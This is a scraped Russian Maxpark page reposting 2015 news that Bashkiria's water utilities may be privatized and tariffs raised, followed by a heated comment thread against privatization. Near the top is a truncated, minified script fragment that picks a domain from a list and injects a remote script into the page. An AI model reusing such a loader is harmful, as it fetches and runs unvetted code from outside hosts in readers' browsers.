Войти в аккаунт
Хотите наслаждаться полной версией, а также получить неограниченный доступ ко всем материалам?

antichubays 77

Россия, Москва
Заявка на добавление в друзья

Будет ли на пользу дальнейшая прихватизация ПОСЛЕДНИХ гос предприятий ???

Вода в Башкирии подорожает и может стать частной

Сегодня на расширенном заседании правительства Башкирии глава республики Рустэм Хамитов заговорил о воде. И о том, что скоро убыточные муниципальные предприятия, обеспечивающие граждан водой, вполне вероятно, могут стать частными.

«Есть города, где до 50% воды теряется во время ее доставки, -возмутился Рустэм Хамитов. — И эти потери оплачивают жители. Это же дикая ситуация».

«Посмотрите, съездите, потрогайте своими руками задвижки, — обратился он к главам администраций. — Ситуация крайне напряженная».

Дело в том, пояснил глава региона, что на июльском совещании у Президента России Владимиром Путиным было высказано безусловное требование передать неэффективные предприятия (различные «водоканалы» — прим. ред.) в частные руки. Срок исполнения установлен — до 1 января 2016 года.

«Все водоканалы республики находятся в зоне риска, — сказал Рустэм Хамитов. — Если мы будем работать так, как работаем сегодня, то через полгода-год у нас не останется убыточных муниципальных предприятий. Мы будем вынуждены передать их в частные руки. Это может сработать и в минус, причем жирный. Есть примеры в других городах, когда частники резко (в разы) взвинчивали тарифы, и при этом снизилась надежность этих водоканалов. Потом губернаторы с трудом возвращали эти предприятия».

Чтобы улучшить экономику этих предприятий, правительство поднимет тарифы на воду и на канализацию. «Повышение будет достаточно приличное, но суммарное повышение общей стоимости коммунальных услуг в квитанциях будет не очень большим, — заверил Рустэм Хамитов. — Мы вынуждены идти на этот шаг. Не сделав этого, мы просто через год потеряем водоканалы».

<script type="text/javascript">// </script>

 .

<script type="text/javascript">// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("maxpark.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script>

{{ poll_variant.votes }}
{{ poll_variant.vote_percents }}%

{{ poll_variant.answer }}

Всего голосов: {{ rs.votes_count }}

Источник: news.mail.ru
Загружается, подождите ...
{{ rating.votes_against }} {{ rating.rating }} {{ rating.votes_for }}

Комментировать

осталось 1800 символов
Свернуть комментарии

Все комментарии (33)

antichubays 77

комментирует материал 21.08.2015 #

Абаддеть!!! Руководитель региона( главный гос чиновник !!), говорит о госпредприятии ( причем МОНОПОЛИСТЕ!!!) , что оно не эффективно!!! Значит он не эффективно руководит!!! КАК может гос предприятие быть не эффективным ???? Это же надо власти , ОЧЕНЬ сильно постараться , что бы привести его к банкротству!!!

no avatar
antichubays 77

отвечает antichubays 77 на комментарий 21.08.2015 #

ПАРАДОКС !! Вместо того , что бы организовать эффективную работу госпредприятий , предлагают эти предприятия приватизировать и сделать ЧАСТНЫМИ!!!

no avatar
Николай Яцков

отвечает antichubays 77 на комментарий 22.08.2015 #

Ага! Потом отменить счетчики и, идя навстречу пожеланиям потребителей, увеличить "социальную" норму потребления до 1т в сутки на каждую потреблядь. Разумеется с оплатой за год авансом. Июльская жара перегрела вместилище мозгов у Президента. До точки кипения... Вот он и выступил ... "категорически"... Но на фоне медвежат-олигофренов, смотрится звездой, однако...

no avatar
antichubays 77

отвечает Николай Яцков на комментарий 24.08.2015 #

Вообще то нормы потребления на воду уже есть ...но пока разумные ..

no avatar
Николай Яцков

отвечает antichubays 77 на комментарий 24.08.2015 #

Ну да, разумные. С точки зрения слона и гиппопотама вместе взятых...

no avatar
antichubays 77

отвечает Николай Яцков на комментарий 24.08.2015 #

:))) Вода , тепло и жилье большие проблемы РФ . Старение жилищного фонда России, быстрый переход его в категорию ветхого и аварийного ставит под угрозу даже физическую безопасность многих жителей Российской Федерации. По данным Росстроя, на 2005 г. общий износ основных фондов в ЖКХ составил более 60 %, а четверть основных фондов уже полностью отслужила свой срок. Но симптомом еще более фундаментальной угрозы служит реакция общества и власти на тот неумолимый процесс, каким является ветшание жилищного фонда.Процесс идет безостановочно и с ускорением, нет никаких надежд на то, что он вдруг сам собой остановится и повернет вспять. Но все смотрят на это равнодушно, не предпринимают действий, соизмеримых масштабу угрозы, и не пытаются составить разумное представление о ней. Никто даже не делает успокаивающих заявлений, пусть ложных. В них нет необходимости, ибо в обществе нет беспокойства.

no avatar
Николай Яцков

отвечает antichubays 77 на комментарий 25.08.2015 #

Это проблемы, заманив в финансовый капкан или просто вынудив людей приватизировать жилье угрозами повышения оплаты за найм муниципальных квартир, мерзкое буржуйское государство бессовестно переложило на холку новоиспечкнным "собственникам". И если бы только это! Созданные фонды капремонта (как и оплата поставок т.н. ресурсоснабжающих организаций, спекулянтов, по сути) - это еще одна "черная дыра", из которой, попав туда, большая часть денег собранных с населения, чудесным образом наполнит личные карманы заказчиков - региональных представителей и руководителей администраций муниципальных образований всех рангов. Слюны не хватит, чтобы хоть плюнуть в развешенные портреты кандидатов в местные законодательные органы, 99% которых - воры, хорошо известные населению.

no avatar
Николай Яцков

отвечает antichubays 77 на комментарий 22.08.2015 #

Кстати, если бы не охрана, я бы к нему сходил, с предложением. Типа, я мол, буду управлять Вашей собственностью и несобственностью тоже, и платежами ресурсоснабженцам, а Вы мне будете за это платить министерский оклад. Только не просрочьте платежи, а то приставы Вашу собственность за долги заберут и на саммиты не удастся поездить, т.к. заберут и загранпаспорт. А потом, - Вам еще и кредитную историю подпортят...

no avatar
antichubays 77

комментирует материал 21.08.2015 #

Надо лечить не следствие болезни , а саму болезнь ! Все дело в капитализме , а точнее в частной собственности !! Как только что то становится частным , так там начинаются проблемы..

no avatar
Георгий Григорьев

отвечает antichubays 77 на комментарий 21.08.2015 #

Совершенно верно.

no avatar
antichubays 77

отвечает Георгий Григорьев на комментарий 24.08.2015 #

Что делать?

no avatar
Георгий Григорьев

отвечает antichubays 77 на комментарий 24.08.2015 #

Революцию. Другого выхода нет.

no avatar
antichubays 77

отвечает Георгий Григорьев на комментарий 24.08.2015 #

Пока еще есть мирный выход ..

no avatar
Георгий Григорьев

отвечает antichubays 77 на комментарий 24.08.2015 #

Ещё ни одна революция в мире не произошла мирным путем. Олигархи без кровопролития власть не отдадут.

no avatar
antichubays 77

отвечает Георгий Григорьев на комментарий 24.08.2015 #

1505
Мирная революция в Исландии, о которой молчат СМИ. [pikabu.ru]
Показать текст 110 Комментариев; пришло от EndlessSpace 1084 дня назад Политика
Нет новостей из Исландии? Почему? Последнее, что мы слышали, так это то, что люди восстали и скинули банкиров. Затем, пару лет ни на телевидении, ни в газетах нет новостей. Что произошло? Почему СМИ не рассказывают нам, что банкиры успешно сокрушили или свели на нет ещё одно восстание?

Потому что на этот раз победили люди.

Жители Исландии поднялись и заставили своё марионеточное правительство уйти в отставку. Частные банки были национализированы. Долговая афёра, навязанная денежными мешками Британии и Голландии, была объявлена недействительной. Было создано общественное собрание для переписывания исландской Конституции.

Народ Исландии отказался выполнять требования МВФ и возвращать долги частных банкиров.

no avatar
Николай Яцков

отвечает antichubays 77 на комментарий 24.08.2015 #

Точно! Где у нас там хирурги?! Анестезиолога можно не вызывать... :)

no avatar
Михаил Рекус

комментирует материал 21.08.2015 #

90% приватизированных советских предприятий "эффективные" манагеры накрыли медным тазом.
Воду, правда они уничтожить не смогут, а вот содрать с нас дополнительные деньги это запросто.

no avatar
ирина Лотыш

комментирует материал 21.08.2015 #

Ну уж спасибо. Наелись по полной от частной собственности и от прихватизации. Эта раздача госсобственности в частные руки называется: возврат в средневековье.

no avatar
Игорь Лобанов

комментирует материал 22.08.2015 #

"Будет ли на пользу дальнейшая прихватизация ПОСЛЕДНИХ гос предприятий ???" -
- нет, конечно
*
какая ж польза от дележа прибыли между важнейшими фондами предприятий, которые задыхаются без средств, и карманом частника?!

no avatar
Валерий Советский

комментирует материал 23.08.2015 #

Это просто узаконенное ВОРОВСТВО общенародного достояния.

no avatar
Иван Просто Иван

комментирует материал 28.09.2015 #

В данном случае конечно вред. Вопрос один-почему государство в них деньги не вкладывает.

no avatar
antichubays 77

отвечает Иван Просто Иван на комментарий 28.09.2015 #

...Почему во вред ?? Объясни ...ведь ты же считаешь частника более эффективным ...:))

no avatar
Иван Просто Иван

отвечает antichubays 77 на комментарий 29.09.2015 #

А причина проста Толя. Это монополист. А монополией может владеть только государство. При чем желательно что бы его права и обязанности были прописаны на федеральном законодательном уровне-единые для всей страны.

Я понимаю, что твоя задача это не установление истины, а попытки доказать свою правоту, но иногда для начала стоит подумать, что писать.

no avatar
antichubays 77

отвечает Иван Просто Иван на комментарий 29.09.2015 #

Это тебе надо думать ...да и знания для начала пополнить ...:)) Почему же монополист?? Ведь сегодня Частник может вложить СВОИ капиталы и организовать СВОЙ ЛИЧНЫЙ Водоканал , альтернативный , ЭФФЕКТИВНЫЙ и ДЕШЕВЛЕ чем государственный .....в чем проблема???

no avatar
×
Заявите о себе всем пользователям Макспарка!

Заказав эту услугу, Вас смогут все увидеть в блоке "Макспаркеры рекомендуют" - тем самым Вы быстро найдете новых друзей, единомышленников, читателей, партнеров.

Оплата данного размещения производится при помощи Ставок. Каждая купленная ставка позволяет на 1 час разместить рекламу в специальном блоке в правой колонке. В блок попадают три объявления с наибольшим количеством неизрасходованных ставок. По истечении периода в 1 час показа объявления, у него списывается 1 ставка.

Сейчас для мгновенного попадания в этот блок нужно купить 1 ставку.

Цена 10.00 MP
Цена 40.00 MP
Цена 70.00 MP
Цена 120.00 MP
Оплата

К оплате 10.00 MP. У вас на счете 0 MP. Пополнить счет

Войти как пользователь
email
{{ err }}
Password
{{ err }}
captcha
{{ err }}
Обычная pегистрация

Зарегистрированы в Newsland или Maxpark? Войти

email
{{ errors.email_error }}
password
{{ errors.password_error }}
password
{{ errors.confirm_password_error }}
{{ errors.first_name_error }}
{{ errors.last_name_error }}
{{ errors.sex_error }}
{{ errors.birth_date_error }}
{{ errors.agree_to_terms_error }}
Восстановление пароля
email
{{ errors.email }}
Восстановление пароля
Выбор аккаунта

Указанные регистрационные данные повторяются на сайтах Newsland.com и Maxpark.com